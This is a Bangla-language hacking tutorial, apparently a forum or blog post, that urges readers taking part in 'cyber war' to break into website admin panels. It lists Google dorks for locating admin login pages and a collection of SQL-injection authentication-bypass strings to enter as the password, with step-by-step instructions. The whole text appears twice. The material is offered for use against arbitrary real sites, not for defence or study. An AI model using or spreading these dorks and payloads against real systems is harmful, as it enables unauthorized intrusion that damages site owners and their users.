Bangla Hacking Tutorial Part-1
►►মাত্র ৩
মিনিটে ওয়েবসাইট
হ্যাকিং (মেথড
৩)◄◄
আসসালামু আলাইকুম, কেমন আছেন সবাই? আশা করি সবাই সাইবার যুদ্ধে অংশ নিচ্ছেন ।আজকে আপনাদের জন্য যুদ্ধের আরেকটি কৌশল শেয়ার করব ।নবীন যোদ্ধাদের জন্য এই পোস্ট ।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
১.প্রথমে আমরা যাব www.google.com এ।
২.এবার Search বক্সে যে কোন একটি Google dork লিখুন।
৩.আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
৪.এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
৫.যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
৬.এখানে ইউজার নেম দিনঃ “Admin”
৭.তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই
৮.নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
৯.তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
১০.এবার submit এ ক্লিক করুন।
ব্যস কাজ শেষ ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
আসসালামু আলাইকুম, কেমন আছেন সবাই? আশা করি সবাই সাইবার যুদ্ধে অংশ নিচ্ছেন ।আজকে আপনাদের জন্য যুদ্ধের আরেকটি কৌশল শেয়ার করব ।নবীন যোদ্ধাদের জন্য এই পোস্ট ।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
১.প্রথমে আমরা যাব www.google.com এ।
২.এবার Search বক্সে যে কোন একটি Google dork লিখুন।
৩.আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
৪.এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
৫.যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
৬.এখানে ইউজার নেম দিনঃ “Admin”
৭.তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই
৮.নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
৯.তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
১০.এবার submit এ ক্লিক করুন।
ব্যস কাজ শেষ ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
